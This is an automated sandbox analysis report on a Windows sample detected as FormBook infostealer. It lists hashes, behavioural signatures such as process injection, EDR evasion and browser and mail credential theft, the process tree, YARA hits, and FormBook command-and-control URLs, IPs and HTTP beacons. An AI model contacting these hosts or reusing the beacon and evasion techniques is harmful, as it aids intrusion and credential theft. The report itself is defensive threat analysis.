Windows Analysis Report
hh01FRs81x.exe

Overview

General Information

Sample name: hh01FRs81x.exe
renamed because original name is a hash value
Original sample name: e1ac8636bad99361fb9c659acdbfcf925147d60655e0c7ede10c5d6f6f944678.exe
Analysis ID: 1634560
MD5: 353ca51dac0dfc8e05877f1ba27e0b5a
SHA1: b3aee14dd4f0e680cac74309ccdd8faa63c17e95
SHA256: e1ac8636bad99361fb9c659acdbfcf925147d60655e0c7ede10c5d6f6f944678
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • hh01FRs81x.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\hh01FRs81x.exe" MD5: 353CA51DAC0DFC8E05877F1BA27E0B5A)
    • hh01FRs81x.exe (PID: 5504 cmdline: "C:\Users\user\Desktop\hh01FRs81x.exe" MD5: 353CA51DAC0DFC8E05877F1BA27E0B5A)
    • hh01FRs81x.exe (PID: 5880 cmdline: "C:\Users\user\Desktop\hh01FRs81x.exe" MD5: 353CA51DAC0DFC8E05877F1BA27E0B5A)
      • Gm9uUaV91ycxNY3GPL6q.exe (PID: 4444 cmdline: "C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\Vgp8qq3XQ846.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • rekeywiz.exe (PID: 5976 cmdline: "C:\Windows\SysWOW64\rekeywiz.exe" MD5: 89AF1348B5D168DE820BD37C3A263D85)
          • Gm9uUaV91ycxNY3GPL6q.exe (PID: 5744 cmdline: "C:\Program Files (x86)\MSULxKDvvAvUYZuxKaGmoOpBShBPbTzCgDRAWBJRJuHJSnHoD\JtZgzvJRXBco.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 2944 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.1315969342.00000000015E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1315269021.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3336185788.0000000004540000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.3338322375.0000000004E80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3336234747.0000000004590000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.hh01FRs81x.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.hh01FRs81x.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

                AV Detection

Source: http://www.031234990.xyz/ke4e/ | Avira URL Cloud: Label: malware
Source: http://www.manicure-nano.sbs/xe9a/ | Avira URL Cloud: Label: malware
Source: http://www.serenityos.dev/dntg/?R4lxS2-P=Xi77pNpzRwduTXf13DwoRl9ks24bE/OoZO8jI9GlbI12YargANeHXOwJPk3kluRPu8INtGeEgdhJoy+Tym0P0ZbjUAApu4gNis/FV3kbZJq8JK1mGA==&LL=4FHLH | Avira URL Cloud: Label: malware
Source: http://www.manicure-nano.sbs/xe9a/?R4lxS2-P=Js9MLFVrvPDnd5+ni8ZygkxzaO0VIjRaNA+bq5u28njuOQOlbcuyRwAKZGYdeAPN2eXOdFkY4BsziTYcIA5zXcFLq9FbxaZYgBR+Fjebj5zHj3TvFQ==&LL=4FHLH | Avira URL Cloud: Label: malware
Source: http://www.trustai.chat | Avira URL Cloud: Label: malware
Source: http://www.serenityos.dev/dntg/ | Avira URL Cloud: Label: malware
Source: http://www.maplez.online/d762/?LL=4FHLH&R4lxS2-P=hkRV+G/BOAk0D4BpTlV9Zaghp2TJbbj6KayKBaJB/kftfSF33fCtFyI7KdPoKzo9B/N+2BkDoP6YUI3kBM+ouKXf0xQElRNMHavlkiEYI/vjprTQcw== | Avira URL Cloud: Label: malware
Source: http://www.trustai.chat/kv4n/ | Avira URL Cloud: Label: malware
Source: http://www.031234990.xyz/ke4e/?R4lxS2-P=Dd6dmEnwJGfYT0rNhn1NB1b+I6SwAwN4NY0E8cNSqGHJ6me6c02fUEuS6yOsUhW9B84bafP+dgEyFYbDj8j1ZpOCE8bflsPqzLf7RSS1Hu8QkzcZhw==&LL=4FHLH | Avira URL Cloud: Label: malware
Source: http://www.maplez.online/d762/ | Avira URL Cloud: Label: malware
Source: hh01FRs81x.exe | ReversingLabs: Detection: 71%
Source: hh01FRs81x.exe | Virustotal: Detection: 70%
Source: Yara match | File source: 4.2.hh01FRs81x.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.hh01FRs81x.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1315969342.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1315269021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3336185788.0000000004540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3338322375.0000000004E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3336234747.0000000004590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3334175533.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1317262087.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3336041844.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: hh01FRs81x.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: hh01FRs81x.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: IfzV.pdb source: hh01FRs81x.exe
                Source: Binary string: rekeywiz.pdb source: hh01FRs81x.exe, 00000004.00000002.1315530161.0000000001108000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335277197.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: hh01FRs81x.exe, 00000004.00000002.1316126705.0000000001630000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1315573923.0000000004330000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.0000000004690000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1317649566.00000000044E9000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.000000000482E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: IfzV.pdbSHA256u source: hh01FRs81x.exe
                Source: Binary string: wntdll.pdb source: hh01FRs81x.exe, hh01FRs81x.exe, 00000004.00000002.1316126705.0000000001630000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, rekeywiz.exe, 00000007.00000003.1315573923.0000000004330000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.0000000004690000.00000040.00001000.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000003.1317649566.00000000044E9000.00000004.00000020.00020000.00000000.sdmp, rekeywiz.exe, 00000007.00000002.3336342602.000000000482E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: rekeywiz.pdbGCTL source: hh01FRs81x.exe, 00000004.00000002.1315530161.0000000001108000.00000004.00000020.00020000.00000000.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335277197.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: Gm9uUaV91ycxNY3GPL6q.exe, 00000006.00000002.3335000308.0000000000ABF000.00000002.00000001.01000000.00000012.sdmp, Gm9uUaV91ycxNY3GPL6q.exe, 0000000E.00000000.1388624371.0000000000ABF000.00000002.00000001.01000000.00000012.sdmp
Source: C:\Windows\SysWOW64\rekeywiz.exe | Code function: 7_2_006EC780 FindFirstFileW,FindNextFileW,FindClose | 7_2_006EC780
Source: C:\Windows\SysWOW64\rekeywiz.exe | Code function: 4x nop then xor eax, eax | 7_2_006D9FF0
Source: C:\Windows\SysWOW64\rekeywiz.exe | Code function: 4x nop then pop edi | 7_2_006DE313

                Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49704 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49720 -> 81.88.63.46:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49711 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49696 -> 172.67.200.148:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49702 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49747 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49709 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49705 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49714 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49710 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49706 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49731 -> 199.59.243.160:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49699 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49742 -> 217.160.0.24:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49745 -> 217.160.0.24:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49748 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49700 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49718 -> 81.88.63.46:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49736 -> 199.115.118.7:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49733 -> 199.59.243.160:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49740 -> 104.21.96.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49727 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49716 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49726 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49703 -> 194.58.112.174:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49698 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49728 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49725 -> 66.29.133.199:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49701 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49734 -> 199.115.118.7:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49713 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49743 -> 217.160.0.24:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49712 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49721 -> 81.88.63.46:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49729 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49744 -> 217.160.0.24:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49739 -> 104.21.96.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49723 -> 66.29.133.199:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49737 -> 199.115.118.7:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49708 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49738 -> 104.21.96.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49724 -> 66.29.133.199:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49715 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49722 -> 66.29.133.199:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49730 -> 199.59.243.160:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49717 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49707 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49735 -> 199.115.118.7:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49732 -> 199.59.243.160:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49741 -> 104.21.96.1:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49719 -> 81.88.63.46:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49746 -> 84.32.84.32:80
                Source: DNS query: www.031234990.xyz
                Source: DNS query: www.bitcoinescort.xyz
                Source: DNS query: www.chivor.xyz
Source: Joe Sandbox View | IP Address: 144.76.229.203
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownHTTP traffic detected: POST /ke4e/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Length: 197Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Host: www.031234990.xyzOrigin: http://www.031234990.xyzReferer: http://www.031234990.xyz/ke4e/User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SAMSUNG-SM-G730A Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:29:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1wUfl06PsjpoiM0oJLxtBkgYOOIsaPP%2FvDh4iKD%2BQoIsTFNwKQhwsGhH3K813lDl%2Fwa9bl1jhjX2poOuSLo99gev2HIhfOhxN4ShKuRWngCwLMw6IPo0w1BYl0n0mT7EGKS8ZU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f078f8f241e6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1696&min_rtt=1696&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=531&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:30:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:30:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:30:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:30:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 00:30:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 00:30:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 00:30:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 00:30:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:30:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RrUnnIM4ea%2FlH38ryxELBEWeEez95%2BHJdOp8ONUEi4Wd9FeQLpH1WLNhiY4%2BkwHqC%2BCoI6KPF%2Bq2ixJPgGnWR%2BaLXxhIAP2T1o6T%2FQZALxAk5Ai7dSIMtyeV%2BF%2BpV6GxGZrJujU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f230a9090f78-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1485&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:30:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mfe1iX4O4Q5uECethw0%2BhcMAFmIeVUKaBJChK1K8PKCVLLYVN1YCNGq%2FT9J9Tcp%2BXa8Hl9R32arnY6RL6li3%2F8w7dPA1Q7xhq1dVEUk4xrtSUvDzKwqdJm8Rw6oCRI%2FOrTOixoc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f2409d754233-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1740&rtt_var=870&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:31:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y7jCdLTsuJDnNg2qJF9q2APlYuhwslpM0l52YsJtICUCWehYM8CDNz8vMiB5pOUE0PvbJtAAJ%2FP6Q8jnefsJGtnMaaFxjQYP65BrNthLI%2Bti1t8kMtShOaox7Ka9aDIchFWVSNo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f250aae4f3ba-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2025&rtt_var=1012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=983&delivery_rate=0&cwnd=60&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:31:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E8d2kdjLvtip793GUyWipuvBbtrayF0yxt9eFpvLOZIaHkqS0ap34i%2Bs3V9VVQNUh3wy1NMO2MdeX5BVCXmIa2Ie7dy06Xf%2B9GtYDoPoyVFvALM8v4ewbc8FL90mo2Pz9XgsGr8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f2609842b637-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1646&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=531&delivery_rate=0&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 00:31:10 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dmu8/ was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 00:31:12 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dmu8/ was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 00:31:15 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dmu8/ was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 00:31:17 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dmu8/ was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 00:31:23 GMT | Server: Apache | Content-Length: 13840 | Connection: close | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 00:31:25 GMT | Server: Apache | Content-Length: 13840 | Connection: close | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 00:31:28 GMT | Server: Apache | Content-Length: 13840 | Connection: close | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 00:31:30 GMT | Server: Apache | Content-Length: 13840 | Connection: close | Content-Type: text/html; charset=utf-8
